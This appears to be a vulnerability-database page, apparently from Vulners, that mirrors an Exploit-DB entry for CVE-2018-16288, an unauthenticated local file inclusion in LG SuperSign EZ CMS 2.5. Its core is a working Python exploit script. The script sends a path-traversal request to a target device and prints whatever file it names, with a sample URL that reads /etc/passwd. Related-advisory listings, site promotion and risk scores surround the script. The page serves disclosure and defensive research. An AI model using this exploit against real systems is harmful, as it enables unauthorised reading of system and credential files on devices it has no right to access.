Lucene search
K

LG SuperSign EZ CMS 2.5 - Local File Inclusion

🗓️ 19 Sep 2018 00:00:00Reported by Alejandro FanjulType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 40 Views

LG SuperSign EZ CMS 2.5 - Local File Inclusion, LFI vulnerability, unauthorized file acces

Related
Code
ReporterTitlePublishedViews
Family
0day.today
LG SuperSign EZ CMS 2.5 - Local File Inclusion Vulnerability
19 Sep 201800:00
zdt
CNVD
LG SuperSign CMS Arbitrary File Read Vulnerability
18 Sep 201800:00
cnvd
CVE
CVE-2018-16288
14 Sep 201821:00
cve
Cvelist
CVE-2018-16288
14 Sep 201821:00
cvelist
exploitpack
LG SuperSign EZ CMS 2.5 - Local File Inclusion
19 Sep 201800:00
exploitpack
Nuclei
LG SuperSign EZ CMS 2.5 - Local File Inclusion
3 Jun 202606:04
nuclei
NVD
CVE-2018-16288
14 Sep 201821:29
nvd
OpenVAS
Generic HTTP Directory Traversal / File Inclusion (Web Dirs) - Active Check
22 Jul 202100:00
openvas
OSV
CVE-2018-16288
14 Sep 201821:29
osv
Packet Storm
LG SuperSign EZ CMS 2.5 Local File Inclusion
19 Sep 201800:00
packetstorm
Rows per page
# Exploit Title: LG SuperSign EZ CMS 2.5 - Local File Inclusion
# Date: 2018-09-13
# Exploit Author: Alejandro Fanjul
# Vendor Homepage: https://www.lg.com/ar/software-lg-supersign
# Version: SuperSign EZ (CMS)
# Tested on: Web OS 4.0
# CVE : CVE-2018-16288

# More info: http://mamaquieroserpentester.blogspot.com/2018/09/multiple-vulnerabilities-in-lg.html
# Any user can read files from the TV, without authentication due to an existing LFI in the following path:

# http://SuperSign_IP:9080/signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd

# PoC

import requests
import re
from argparse import ArgumentParser

parser = ArgumentParser(description="SuperSign Reboot")
parser.add_argument("-t", "--target", dest="target",
                        help="Target")
parser.add_argument("-p", "--path", dest="filepath",
                        help="path to the file you want to read")

args = parser.parse_args()
path = args.filepath

s = requests.get('http://'+ str(args.target).replace('\n', '') +'/signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..'+str(path))
print s.text

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

19 Sep 2018 00:00Current
8.7High risk
Vulners AI Score8.7
CVSS 27.8
CVSS 38.6
EPSS0.62704
40